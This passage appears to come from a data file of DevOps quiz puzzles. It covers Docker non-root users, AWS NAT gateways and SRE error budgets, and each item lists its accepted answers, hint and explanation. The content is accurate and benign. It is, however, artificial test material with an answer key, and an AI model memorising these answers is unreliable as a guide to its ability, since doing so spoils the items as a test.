    explanation: 'The `USER` directive drops root privileges in a Docker container, mitigating host kernel compromise in the event of a container escape.',
    tags: ['devops', 'docker', 'security', 'rootless', 'hardening', 'sector-5'],
  },
  {
    id: '00000005-0000-4000-8000-000000000013',
    sector_level: 5,
    puzzle_slot: 13,
    domain: 'DevOps & Cloud Infrastructure',
    difficulty: 'Advanced',
    title: 'The Private Subnet Egress Valve',
    scenario: 'Database servers in a private VPC subnet without public IPs must download security patches from external OS repositories without exposing incoming ports.',
    question: 'What AWS VPC networking gateway translates private subnet IP addresses to a public IP to enable outbound internet access while blocking inbound traffic?',
    code_snippet: '// Private Subnet Route Table:\n// 0.0.0.0/0 -> nat-0abc1234def\n// WHAT MANAGED GATEWAY IS THIS?',
    answer: ['nat gateway', 'nat', 'nat-gateway', 'network address translation gateway'],
    hint: 'Network Address Translation Gateway.',
    explanation: 'A NAT Gateway enables outbound internet access for instances in a private subnet while shielding them from inbound connections originating from the internet.',
    tags: ['devops', 'vpc', 'networking', 'nat-gateway', 'subnets', 'sector-5'],
  },
  {
    id: '00000005-0000-4000-8000-000000000014',
    sector_level: 5,
    puzzle_slot: 14,
    domain: 'DevOps & Cloud Infrastructure',
    difficulty: 'Expert',
    title: 'The SRE Error Budget Threshold',
    scenario: 'The facility reliability SLA is 99.9% uptime. Frequent reckless deployments exhausted the acceptable failure threshold, halting all new feature rollouts.',
    question: 'In Site Reliability Engineering (SRE), what term describes the allowable room for unreliability (100% - SLO) that teams can spend on velocity?',
    code_snippet: '// If SLO is 99.9% availability, the remaining 0.1% downtime represents the team\'s:\n// WHAT SRE TERM DESCRIBES THIS ALLOWANCE?',
    answer: ['error budget', 'error-budget', 'the error budget'],
    hint: 'A "budget" for allowable "errors".',
    explanation: 'An Error Budget (100% minus SLO target) sets a quantifiable boundary balancing innovation speed against system stability.',
    tags: ['devops', 'sre', 'error-budget', 'slo', 'sli', 'reliability', 'sector-5'],
  },
];
